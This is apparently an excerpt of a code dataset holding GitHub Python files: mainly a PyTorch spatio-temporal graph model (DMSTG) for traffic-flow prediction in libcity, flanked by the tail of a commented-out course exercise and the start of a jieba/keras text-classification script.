\")\n\n# email = \"\"\n# email_confirmation = \"\"\n\n# def get_email():\n# email = input(\"Finally, what is your email? \")\n# email_confirmation = input(\"Please type your email a second time for confirmation: \")\n# return email, email_confirmation\n\n# get_email()\n# email_confirmed = False\n# while email_confirmed:\n# if email == email_confirmation:\n# print(\"Brilliant! You made the cut. You're in the Flight Club!\")\n# email_confirmed = True\n# else:\n# get_email()\n\n\n# new_data = {\n# \"user\": {\n# \"firstName\": first_name,\n# \"lastName\": last_name,\n# \"email\": email\n# }\n# }\n# response = requests.post(\n# url=SHEETY_USERS_ENDPOINT,\n# json=new_data\n# )\n# data = response.json()\n# print(data[\"user\"])\n","repo_name":"RyanLBuchanan/AngelaYu_AppBrewery","sub_path":"Assignments/Intermediate_Modules/Day_40/flight_club/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25380202392","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom functools import partial\nfrom logging import getLogger\nfrom libcity.model import loss\nfrom libcity.model.abstract_traffic_state_model import AbstractTrafficStateModel\nimport time\n\n\ndef drop_path(x, drop_prob=0., training=False):\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1)\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_()\n output = x.div(keep_prob) * random_tensor\n return output\n\ndef cal_laplacian(adj):\n adj += np.eye(adj.shape[0])\n degree = np.array(adj.sum(1))\n degree = np.diag(np.power(degree, -0.5))\n return degree.dot(adj).dot(degree)\n\nclass ChebGraphConvForBatch(nn.Module):\n def __init__(self, c_in, c_out, Ks, bias):\n super().__init__()\n self.c_in = c_in\n self.c_out = c_out\n self.Ks = Ks\n self.weight = nn.Parameter(torch.FloatTensor(Ks, c_in, c_out))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(c_out))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x, dnGso):\n x = torch.permute(x, (0, 2, 3, 1))\n\n if self.Ks - 1 < 0:\n raise ValueError(\n f'ERROR: the graph convolution kernel size Ks has to be a positive integer, but received {self.Ks}.')\n elif self.Ks - 1 == 0:\n x_0 = x\n x_list = [x_0]\n elif self.Ks - 1 == 1:\n x_0 = x\n x_1 = torch.einsum('bhi,btij->bthj', dnGso, x)\n x_list = [x_0, x_1]\n elif self.Ks - 1 >= 2:\n x_0 = x\n x_1 = torch.einsum('bhi,btij->bthj', dnGso, x)\n x_list = [x_0, x_1]\n for k in range(2, self.Ks):\n x_list.append(torch.einsum('bhi,btij->bthj', 2 * dnGso, x_list[k - 1]) - x_list[k - 2])\n\n x = torch.stack(x_list, dim=2)\n\n cheb_graph_conv = torch.einsum('btkhi,kij->bthj', x, self.weight)\n\n if self.bias is not None:\n cheb_graph_conv = torch.add(cheb_graph_conv, self.bias)\n else:\n cheb_graph_conv = cheb_graph_conv\n\n return cheb_graph_conv\n\nclass ChebGraphConv(nn.Module):\n def __init__(self, c_in, c_out, Ks, gso, bias):\n super().__init__()\n self.c_in = c_in\n self.c_out = c_out\n self.Ks = Ks\n 
self.gso = gso\n self.weight = nn.Parameter(torch.FloatTensor(Ks, c_in, c_out))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(c_out))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x):\n x = torch.permute(x, (0, 2, 3, 1))\n\n if self.Ks - 1 < 0:\n raise ValueError(\n f'ERROR: the graph convolution kernel size Ks has to be a positive integer, but received {self.Ks}.')\n elif self.Ks - 1 == 0:\n x_0 = x\n x_list = [x_0]\n elif self.Ks - 1 == 1:\n x_0 = x\n x_1 = torch.einsum('hi,btij->bthj', self.gso, x)\n x_list = [x_0, x_1]\n elif self.Ks - 1 >= 2:\n x_0 = x\n x_1 = torch.einsum('hi,btij->bthj', self.gso, x)\n x_list = [x_0, x_1]\n for k in range(2, self.Ks):\n x_list.append(torch.einsum('hi,btij->bthj', 2 * self.gso, x_list[k - 1]) - x_list[k - 2])\n\n x = torch.stack(x_list, dim=2)\n\n cheb_graph_conv = torch.einsum('btkhi,kij->bthj', x, self.weight)\n\n if self.bias is not None:\n cheb_graph_conv = torch.add(cheb_graph_conv, self.bias)\n else:\n cheb_graph_conv = cheb_graph_conv\n\n return cheb_graph_conv\n\nclass TokenEmbedding(nn.Module):\n def __init__(self, input_dim, embed_dim, norm_layer=None):\n super().__init__()\n self.token_embed = nn.Linear(input_dim, embed_dim, bias=True)\n self.norm = norm_layer(embed_dim) if norm_layer is not None else nn.Identity()\n\n def forward(self, x):\n x = self.token_embed(x)\n x = self.norm(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, embed_dim, max_len=100):\n super(PositionalEncoding, self).__init__()\n pe = torch.zeros(max_len, embed_dim).float()\n pe.require_grad = False\n\n position = torch.arange(0, max_len).float().unsqueeze(1)\n div_term = (torch.arange(0, embed_dim, 2).float() * -(math.log(10000.0) / embed_dim)).exp()\n\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n return self.pe[:, :x.size(1)].unsqueeze(2).expand_as(x).detach()\n\n\nclass LaplacianPE(nn.Module):\n def __init__(self, lape_dim, embed_dim):\n super().__init__()\n self.embedding_lap_pos_enc = nn.Linear(lape_dim, embed_dim)\n\n def forward(self, lap_mx):\n lap_pos_enc = self.embedding_lap_pos_enc(lap_mx).unsqueeze(0).unsqueeze(0)\n return lap_pos_enc\n\n\nclass DataEmbedding(nn.Module):\n def __init__(\n self, feature_dim, embed_dim, lape_dim, adj_mx, drop=0.,\n add_time_in_day=False, add_day_in_week=False, device=torch.device('cuda'),\n ):\n super().__init__()\n\n self.add_time_in_day = add_time_in_day\n self.add_day_in_week = add_day_in_week\n\n self.device = device\n self.embed_dim = embed_dim\n self.feature_dim = feature_dim\n self.value_embedding = TokenEmbedding(feature_dim, embed_dim)\n\n self.position_encoding = PositionalEncoding(embed_dim)\n if self.add_time_in_day:\n self.minute_size = 1440\n self.daytime_embedding = nn.Embedding(self.minute_size, embed_dim)\n if self.add_day_in_week:\n weekday_size = 7\n self.weekday_embedding = nn.Embedding(weekday_size, embed_dim)\n self.spatial_embedding = LaplacianPE(lape_dim, embed_dim)\n self.dropout = nn.Dropout(drop)\n\n def forward(self, x, lap_mx):\n origin_x = x\n x = self.value_embedding(origin_x[:, :, :, :self.feature_dim])\n x += 
self.position_encoding(x)\n if self.add_time_in_day:\n x += self.daytime_embedding((origin_x[:, :, :, self.feature_dim] * self.minute_size).round().long())\n if self.add_day_in_week:\n x += self.weekday_embedding(origin_x[:, :, :, self.feature_dim + 1: self.feature_dim + 8].argmax(dim=3))\n x += self.spatial_embedding(lap_mx)\n x = self.dropout(x)\n return x\n\n\nclass DropPath(nn.Module):\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\n\nclass Chomp2d(nn.Module):\n def __init__(self, chomp_size):\n super(Chomp2d, self).__init__()\n self.chomp_size = chomp_size\n\n def forward(self, x):\n return x[:, :, :x.shape[2] - self.chomp_size, :].contiguous()\n\nclass LUpdator(nn.Module):\n def __init__(self, T, N, k_spatial=60, k_temporal=12):\n super().__init__()\n self.T = T\n self.N = N\n\n u_spatial = torch.randn((N, k_spatial), requires_grad=True)\n self.u_spatial = torch.nn.Parameter(u_spatial)\n self.register_parameter(\"u_spatial\", self.u_spatial)\n\n u_temporal = torch.randn((T, k_temporal), requires_grad=True)\n self.u_temporal = torch.nn.Parameter(u_temporal)\n self.register_parameter(\"u_temporal\", self.u_temporal)\n\n self.conv2d_1 = torch.nn.Conv2d(3, 1, kernel_size=(1, 1))\n self.norm = nn.LayerNorm(normalized_shape=[N, N])\n self.relu = nn.ReLU()\n\n def forward(self, x, spatialL, geo_mask):\n B, T, N, D = x.shape\n x = x.permute(0, 2, 1, 3)\n u_spatial = torch.einsum(\"ik,kj->ij\", [self.u_spatial, torch.transpose(self.u_spatial, 0, 1)])\n u_temporal = torch.einsum(\"ik,kj->ij\", [self.u_temporal, torch.transpose(self.u_temporal, 0, 1)])\n sn_lowrank = torch.einsum(\"bitk,ij->bjtk\", [x, u_spatial])\n sn_lowrank = torch.einsum(\"bitk,tj->bijk\", [sn_lowrank, u_temporal])\n sn_exception = x - sn_lowrank\n\n sn_lowrank = sn_lowrank.reshape(B, N, T * D)\n sn_exception = sn_exception.reshape(B, N, T * D)\n sn_lowrank = sn_lowrank - torch.mean(sn_lowrank, dim=2, keepdim=True)\n sn_exception = sn_exception - torch.mean(sn_exception, dim=2, keepdim=True)\n\n x_ee = torch.einsum(\"bik,bkj->bij\", [sn_exception, torch.transpose(sn_exception, 1, 2)])\n x_ee = self.norm(x_ee)\n x_le = torch.einsum(\"bik,bkj->bij\", [sn_lowrank, torch.transpose(sn_exception, 1, 2)])\n x_le = self.norm(x_le)\n x_el = torch.einsum(\"bik,bkj->bij\", [sn_exception, torch.transpose(sn_lowrank, 1, 2)])\n x_el = self.norm(x_el)\n\n covList = []\n covList.append(x_ee)\n covList.append(x_le)\n covList.append(x_el)\n covTensor = torch.stack(covList, dim=-1).permute(0, 3, 1, 2)\n B_conv = self.conv2d_1(covTensor)\n B_conv = self.relu(B_conv)\n\n B_conv = B_conv.reshape(B, N, N)\n\n BQ = torch.einsum(\"bik,bkj->bij\", [B_conv, spatialL])\n taylorTerm = 3\n forIterm = -torch.einsum(\"bik,bkj->bij\", [spatialL, BQ])\n spatialL_update = forIterm.clone()\n for i in range(taylorTerm):\n forIterm = -torch.einsum(\"bik,bkj->bij\", [forIterm, BQ])\n spatialL_update = spatialL_update + forIterm\n\n spatialL = spatialL + spatialL_update\n spatialL.masked_fill_(geo_mask, 0)\n\n spatialL = torch.clamp(spatialL, -1, 0)\n spatialL_degree = torch.abs(torch.sum(spatialL, dim=2, keepdims=True))\n spatialL = torch.eye(int(N), device=torch.device(\"cuda\")) + spatialL / torch.clamp(spatialL_degree, 0.00000001, 10000000)\n return spatialL\n\nclass DSTFormer(nn.Module):\n def __init__(self, c_in, c_out, qkv_bias=False, attn_drop=0., proj_drop=0., device=torch.device('cuda')):\n super().__init__()\n 
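# 1x1 convolutions project the channels to query/key/value maps for the attention in forward()\n        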
self.sem_q_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_k_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_v_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(c_in, c_in)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def assemblingMask(self, geo_mask):\n N = geo_mask.shape[0]\n true_mask = torch.ones([N, N], device=torch.device(\"cuda\"))\n uneye_mask = torch.ones([N, N], device=torch.device(\"cuda\")) - torch.eye(int(N), device=torch.device(\"cuda\"))\n true_mask = true_mask.bool()\n uneye_mask = uneye_mask.bool()\n\n L_row1 = torch.concat([geo_mask, uneye_mask, true_mask], 0)\n L_row2 = torch.concat([uneye_mask, geo_mask, uneye_mask], 0)\n L_row3 = torch.concat([true_mask, uneye_mask, geo_mask], 0)\n return torch.concat([L_row1, L_row2, L_row3], 1)\n\n def forward(self, x, geo_mask=None, sem_mask=None):\n B, T, N, D = x.shape\n x = torch.concat([x[:, 0, :, :].reshape(B,1,N,D), x, x[:, T-1, :, :].reshape(B,1,N,D)], 1)\n\n stX = x.unfold(1,3,1)\n stX = stX.permute(0, 3, 1, 4, 2)\n stX = stX.reshape(stX.shape[0], stX.shape[1], stX.shape[2], stX.shape[3]*stX.shape[4])\n\n sem_q = self.sem_q_conv(stX).permute(0, 2, 3, 1)\n sem_k = self.sem_k_conv(stX).permute(0, 2, 3, 1)\n sem_v = self.sem_v_conv(stX).permute(0, 2, 3, 1)\n sem_attn = (sem_q @ sem_k.transpose(-2, -1))\n\n geo_mask = self.assemblingMask(geo_mask)\n if geo_mask is not None:\n sem_attn.masked_fill_(geo_mask, float('-inf'))\n\n\n sem_attn = sem_attn.softmax(dim=-1)\n sem_attn = self.sem_attn_drop(sem_attn)\n sem_x = (sem_attn @ sem_v).transpose(2, 3).reshape(B, T, 3*N, -1)\n sem_x = sem_x.reshape(B, T, 3, N, -1)\n sem_x = sem_x[:, :, 1, :, :].reshape(B, T, N, -1)\n x = self.proj_drop(sem_x)\n return x\n\nclass CrossAttention(nn.Module):\n def __init__(self, c_in=22, c_out=22, qkv_bias=False, attn_drop=0., proj_drop=0., device=torch.device('cuda')):\n super().__init__()\n self.sem_q_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_k_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_v_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(c_in, c_in)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x, y):\n B, D, T, N = x.shape\n\n sem_q = self.sem_q_conv(x).permute(0, 2, 3, 1)\n sem_k = self.sem_k_conv(y).permute(0, 2, 3, 1)\n sem_v = self.sem_v_conv(y).permute(0, 2, 3, 1)\n sem_attn = (sem_q @ sem_k.transpose(-2, -1))\n sem_attn = sem_attn.softmax(dim=-1)\n sem_attn = self.sem_attn_drop(sem_attn)\n\n sem_x = (sem_attn @ sem_v)\n z = self.proj_drop(sem_x)\n return z\n\nclass AFF(nn.Module):\n def __init__(self, channels=22, inter_channels=6):\n super(AFF, self).__init__()\n\n self.local_att = nn.Sequential(\n nn.Conv2d(channels, inter_channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(inter_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(inter_channels, channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(channels),\n )\n\n self.global_att = nn.Sequential(\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(channels, inter_channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(inter_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(inter_channels, channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(channels),\n )\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x, residual):\n xa = x + residual\n xl = self.local_att(xa)\n xg = 
self.global_att(xa)\n xlg = xl + xg\n wei = self.sigmoid(xlg)\n xo = 2 * x * wei + 2 * residual * (1 - wei)\n return xo\n\nclass DSTGCN(nn.Module):\n def __init__(self, c_in, c_out, ks, N, T=12, bias=None):\n super().__init__()\n self.cheb_graph_conv1 = ChebGraphConvForBatch(c_in, c_out, ks, bias)\n self.cheb_graph_conv2 = ChebGraphConvForBatch(c_out, c_out, ks, bias)\n\n p_t12 = torch.randn(N, requires_grad=True)\n self.p_t12 = torch.nn.Parameter(p_t12)\n self.register_parameter(\"p_t12\", self.p_t12)\n\n p_t21 = torch.randn(N, requires_grad=True)\n self.p_t21 = torch.nn.Parameter(p_t21)\n self.register_parameter(\"p_t21\", self.p_t21)\n\n p_t23 = torch.randn(N, requires_grad=True)\n self.p_t23 = torch.nn.Parameter(p_t23)\n self.register_parameter(\"p_t23\", self.p_t23)\n\n p_t32 = torch.randn(N, requires_grad=True)\n self.p_t32 = torch.nn.Parameter(p_t32)\n self.register_parameter(\"p_t32\", self.p_t32)\n\n self.norm = nn.LayerNorm(c_out)\n\n def assemblingL(self, p_t12, p_t21, p_t23, p_t32, gso, B):\n N = p_t12.shape[0]\n p_t12 = torch.diag_embed(p_t12).reshape(1, N, N).repeat(B, 1, 1)\n p_t21 = torch.diag_embed(p_t21).reshape(1, N, N).repeat(B, 1, 1)\n p_t23 = torch.diag_embed(p_t23).reshape(1, N, N).repeat(B, 1, 1)\n p_t32 = torch.diag_embed(p_t32).reshape(1, N, N).repeat(B, 1, 1)\n\n zeroN = torch.zeros([B, N, N], device=torch.device(\"cuda\"))\n L_row1 = torch.concat([gso, p_t12, zeroN], 1)\n L_row2 = torch.concat([p_t21, gso, p_t23], 1)\n L_row3 = torch.concat([zeroN, p_t32, gso], 1)\n return torch.concat([L_row1, L_row2, L_row3], 2)\n\n def forward(self, x, st_gso):\n B, T, N, D = x.shape\n\n st_gso = self.assemblingL(self.p_t12, self.p_t21, self.p_t23, self.p_t32, st_gso, B)\n\n x = torch.concat([x[:, 0, :, :].reshape(B,1,N,D), x, x[:, T - 1, :, :].reshape(B,1,N,D)], 1)\n\n stX = x.unfold(1,3,1)\n stX = stX.permute(0, 3, 1, 4, 2)\n stX = stX.reshape(stX.shape[0], stX.shape[1], stX.shape[2], stX.shape[3]*stX.shape[4])\n\n h = self.cheb_graph_conv1(stX, st_gso).permute(0, 3, 1, 2)\n h = h.reshape(h.shape[0], h.shape[1], h.shape[2], 3, -1)\n h = h[:, :, :, 1, :].reshape(h.shape[0], h.shape[1], h.shape[2], -1)\n h = self.norm(torch.permute(h, (0, 2, 3, 1)))\n return h\n\nclass LSTGCN(nn.Module):\n\n def __init__(self, c_in, c_out, ks, gso, bias=None):\n super().__init__()\n self.c_in = c_in\n self.c_out = c_out\n self.ks = ks\n self.gso = gso\n self.bias = bias\n\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n self.relu = nn.ReLU()\n self.leaky_relu = nn.LeakyReLU()\n self.cheb_graph_conv = ChebGraphConv(c_in, c_out, ks, gso, bias)\n\n self.conv2d = nn.Conv2d(in_channels=c_out, out_channels=c_out, kernel_size=(12, 1))\n self.sig_conv2d = nn.Conv2d(in_channels=c_out, out_channels=c_out, kernel_size=(12, 1))\n\n def forward(self, x):\n B, T, N, D = x.shape\n x = torch.permute(x, (0, 3, 1, 2))\n x=self.cheb_graph_conv(x).permute(0, 3, 1, 2)\n x = torch.mul(self.tanh(self.conv2d(x)), self.sigmoid(self.sig_conv2d(x)))\n x = x.permute(0, 2, 3, 1)\n return x\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n 
return x\n\nclass STEncoderBlock(nn.Module):\n def __init__(\n self, c_in, c_out, ks, gso, mlp_ratio=4., qkv_bias=True, drop=0., attn_drop=0.,\n drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm, device=torch.device('cuda'), output_dim=1):\n super().__init__()\n self.norm1 = norm_layer(c_in)\n self.dstformer = DSTFormer(c_in, c_out, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop, device=device)\n self.dstgcn = DSTGCN(c_in, c_out, ks, int(gso.shape[0]), bias=None)\n self.lstgcn = LSTGCN(c_in, c_out, ks, gso, bias=None)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n self.norm2 = norm_layer(c_in)\n self.mlp = Mlp(in_features=c_in, hidden_features=c_in, act_layer=act_layer, drop=drop)\n\n self.aff = AFF()\n self.cross_atten = CrossAttention()\n self.device = torch.device('cuda')\n\n def forward(self, x, st_gso, geo_mask=None, sem_mask=None):\n norm_x = self.norm1(x)\n torch.cuda.synchronize(self.device)\n x_dg = self.dstgcn(norm_x, st_gso).permute(0, 3, 1, 2)\n torch.cuda.synchronize(self.device)\n\n x_lg = self.lstgcn(norm_x).repeat(1, 12, 1, 1).permute(0, 3, 1, 2)\n torch.cuda.synchronize(self.device)\n\n x_df = self.dstformer(norm_x, geo_mask=geo_mask, sem_mask=sem_mask).permute(0, 3, 1, 2)\n torch.cuda.synchronize(self.device)\n\n x_dst = self.aff(x_df, x_lg)\n x_st = self.cross_atten(x_dg, x_dst)\n\n x_st = torch.cat([x_dg.permute(0, 2, 3, 1), x_dst.permute(0, 2, 3, 1), x_st], dim=-1)\n x = x + self.drop_path(x_st)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n\n return x\n\nclass DMSTG(AbstractTrafficStateModel):\n def __init__(self, config, data_feature):\n super().__init__(config, data_feature)\n\n self._scaler = self.data_feature.get('scaler')\n self.num_nodes = self.data_feature.get(\"num_nodes\", 1)\n self.feature_dim = self.data_feature.get(\"feature_dim\", 1)\n self.ext_dim = self.data_feature.get(\"ext_dim\", 0)\n self.num_batches = self.data_feature.get('num_batches', 1)\n\n self.dtw_matrix = self.data_feature.get('dtw_matrix')\n\n self.adj_mx = data_feature.get('adj_mx')\n sd_mx = data_feature.get('sd_mx')\n sh_mx = data_feature.get('sh_mx')\n self._logger = getLogger()\n self.dataset = config.get('dataset')\n\n self.c_in = config.get('c_in', 66)\n self.c_out = config.get('c_out', 22)\n self.ks = config.get('ks', 3)\n\n self.embed_dim = 66\n self.skip_dim = config.get(\"skip_dim\", 256)\n lape_dim = config.get('lape_dim', 8)\n mlp_ratio = config.get(\"mlp_ratio\", 4)\n qkv_bias = config.get(\"qkv_bias\", True)\n drop = config.get(\"drop\", 0.)\n attn_drop = config.get(\"attn_drop\", 0.)\n drop_path = config.get(\"drop_path\", 0.3)\n enc_depth = config.get(\"enc_depth\", 2)\n self.type_short_path = config.get(\"type_short_path\", \"hop\")\n\n self.output_dim = config.get('output_dim', 1)\n self.input_window = config.get(\"input_window\", 12)\n self.output_window = config.get('output_window', 12)\n add_time_in_day = config.get(\"add_time_in_day\", True)\n add_day_in_week = config.get(\"add_day_in_week\", True)\n self.device = config.get('device', torch.device('cuda'))\n self.world_size = config.get('world_size', 1)\n self.huber_delta = config.get('huber_delta', 1)\n self.quan_delta = config.get('quan_delta', 0.25)\n self.far_mask_delta = config.get('far_mask_delta', 5)\n self.dtw_delta = config.get('dtw_delta', 5)\n\n self.use_curriculum_learning = config.get('use_curriculum_learning', True)\n self.step_size = config.get('step_size', 2500)\n self.max_epoch = config.get('max_epoch', 200)\n self.task_level = 
config.get('task_level', 0)\n if self.max_epoch * self.num_batches * self.world_size < self.step_size * self.output_window:\n self._logger.warning('Parameter `step_size` is too big with {} epochs and '\n 'the model cannot be trained for all time steps.'.format(self.max_epoch))\n if self.use_curriculum_learning:\n self._logger.info('Use use_curriculum_learning!')\n\n if self.type_short_path == \"dist\":\n distances = sd_mx[~np.isinf(sd_mx)].flatten()\n std = distances.std()\n sd_mx = np.exp(-np.square(sd_mx / std))\n self.far_mask = torch.zeros(self.num_nodes, self.num_nodes).to(self.device)\n self.far_mask[sd_mx < self.far_mask_delta] = 1\n self.far_mask = self.far_mask.bool()\n else:\n\n sh_mx = sh_mx.T\n self.geo_mask = torch.zeros(self.num_nodes, self.num_nodes).to(self.device)\n self.geo_mask[sh_mx >= self.far_mask_delta] = 1\n self.geo_mask = self.geo_mask.bool()\n self.sem_mask = torch.ones(self.num_nodes, self.num_nodes).to(self.device)\n sem_mask = self.dtw_matrix.argsort(axis=1)[:, :self.dtw_delta]\n for i in range(self.sem_mask.shape[0]):\n self.sem_mask[i][sem_mask[i]] = 0\n self.sem_mask = self.sem_mask.bool()\n\n\n st_gso = cal_laplacian(self.dtw_matrix)\n self.st_gso = torch.from_numpy(st_gso).float().to(self.device)\n\n gso = cal_laplacian(self.adj_mx)\n self.gso = torch.from_numpy(gso).float().to(self.device)\n\n self.enc_embed_layer = DataEmbedding(\n self.feature_dim - self.ext_dim, self.embed_dim, lape_dim, self.adj_mx, drop=drop,\n add_time_in_day=add_time_in_day, add_day_in_week=add_day_in_week, device=self.device,\n )\n\n enc_dpr = [x.item() for x in torch.linspace(0, drop_path, enc_depth)]\n\n self.encoder_blocks = nn.ModuleList([\n STEncoderBlock(\n c_in=self.c_in, c_out=self.c_out, ks=self.ks, gso=self.gso, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, drop=drop, attn_drop=attn_drop,\n drop_path=enc_dpr[i], act_layer=nn.GELU, norm_layer=partial(nn.LayerNorm, eps=1e-6), device=self.device, output_dim=self.output_dim\n ) for i in range(enc_depth)\n ])\n\n self.skip_convs = nn.ModuleList([\n nn.Conv2d(\n in_channels=self.embed_dim, out_channels=self.skip_dim, kernel_size=1,\n ) for _ in range(enc_depth)\n ])\n\n self.end_conv1 = nn.Conv2d(\n in_channels=self.input_window, out_channels=self.output_window, kernel_size=1, bias=True,\n )\n self.end_conv2 = nn.Conv2d(\n in_channels=self.skip_dim, out_channels=self.output_dim, kernel_size=1, bias=True,\n )\n self.lupdator = LUpdator(12, int(self.num_nodes))\n\n def forward(self, batch, lap_mx=None):\n x = batch['X']\n enc = self.enc_embed_layer(x, lap_mx)\n skip = 0\n N = int(self.st_gso.shape[0])\n B = int(enc.shape[0])\n st_gso = self.st_gso.reshape(1, N, N)\n st_gso = st_gso.repeat(B, 1, 1)\n\n st_gso = self.lupdator(enc, st_gso, self.geo_mask)\n\n\n for i, encoder_block in enumerate(self.encoder_blocks):\n enc = encoder_block(enc, st_gso, self.geo_mask, self.sem_mask)\n\n skip += self.skip_convs[i](enc.permute(0, 3, 2, 1))\n\n skip = self.end_conv1(F.relu(skip.permute(0, 3, 2, 1)))\n\n skip = self.end_conv2(F.relu(skip.permute(0, 3, 2, 1)))\n\n return skip.permute(0, 3, 2, 1)\n\n def get_loss_func(self, set_loss):\n if set_loss.lower() not in ['mae', 'mse', 'rmse', 'mape', 'logcosh', 'huber', 'quantile', 'masked_mae',\n 'masked_mse', 'masked_rmse', 'masked_mape', 'masked_huber', 'r2', 'evar']:\n self._logger.warning('Received unrecognized train loss function, set default mae loss func.')\n if set_loss.lower() == 'mae':\n lf = loss.masked_mae_torch\n elif set_loss.lower() == 'mse':\n lf = loss.masked_mse_torch\n elif 
set_loss.lower() == 'rmse':\n lf = loss.masked_rmse_torch\n elif set_loss.lower() == 'mape':\n lf = loss.masked_mape_torch\n elif set_loss.lower() == 'logcosh':\n lf = loss.log_cosh_loss\n elif set_loss.lower() == 'huber':\n lf = partial(loss.huber_loss, delta=self.huber_delta)\n elif set_loss.lower() == 'quantile':\n lf = partial(loss.quantile_loss, delta=self.quan_delta)\n elif set_loss.lower() == 'masked_mae':\n lf = partial(loss.masked_mae_torch, null_val=0)\n elif set_loss.lower() == 'masked_mse':\n lf = partial(loss.masked_mse_torch, null_val=0)\n elif set_loss.lower() == 'masked_rmse':\n lf = partial(loss.masked_rmse_torch, null_val=0)\n elif set_loss.lower() == 'masked_mape':\n lf = partial(loss.masked_mape_torch, null_val=0)\n elif set_loss.lower() == 'masked_huber':\n lf = partial(loss.masked_huber_loss, delta=self.huber_delta, null_val=0)\n elif set_loss.lower() == 'r2':\n lf = loss.r2_score_torch\n elif set_loss.lower() == 'evar':\n lf = loss.explained_variance_score_torch\n else:\n lf = loss.masked_mae_torch\n return lf\n\n def calculate_loss_without_predict(self, y_true, y_predicted, batches_seen=None, set_loss='masked_mae'):\n lf = self.get_loss_func(set_loss=set_loss)\n y_true = self._scaler.inverse_transform(y_true[..., :self.output_dim])\n y_predicted = self._scaler.inverse_transform(y_predicted[..., :self.output_dim])\n if self.training:\n if batches_seen % self.step_size == 0 and self.task_level < self.output_window:\n self.task_level += 1\n self._logger.info('Training: task_level increase from {} to {}'.format(\n self.task_level - 1, self.task_level))\n self._logger.info('Current batches_seen is {}'.format(batches_seen))\n if self.use_curriculum_learning:\n return lf(y_predicted[:, :self.task_level, :, :], y_true[:, :self.task_level, :, :])\n else:\n return lf(y_predicted, y_true)\n else:\n return lf(y_predicted, y_true)\n\n def calculate_loss(self, batch, batches_seen=None, lap_mx=None):\n y_true = batch['y']\n y_predicted = self.predict(batch, lap_mx)\n return self.calculate_loss_without_predict(y_true, y_predicted, batches_seen)\n\n def predict(self, batch, lap_mx=None):\n return self.forward(batch, lap_mx)\n","repo_name":"Polarstar671/DMSTG","sub_path":"libcity/model/traffic_flow_prediction/DMSTG.py","file_name":"DMSTG.py","file_ext":"py","file_size_in_byte":29450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15404232482","text":"import pandas as pd\nimport sys \nimport numpy as np\nimport math as m\nfrom keras.models import load_model\nimport jieba\nfrom gensim.models import word2vec\nimport h5py\nfrom keras.preprocessing.sequence import pad_sequences\n\njieba.load_userdict(sys.argv[2])\n\ntest_x = pd.read_csv(sys.argv[1], sep='delimiter', encoding='utf8')\ntest_x = pd.DataFrame(test_x)\ntest_x = np.array(test_x)\ntable = test_x.reshape([len(test_x)])\nran = len(table)\nfor i in range(ran):\n\ttable[i] = table[i].split(',', 1)[1]\n\ttable[i] = jieba.cut(table[i])\n\nmodel = 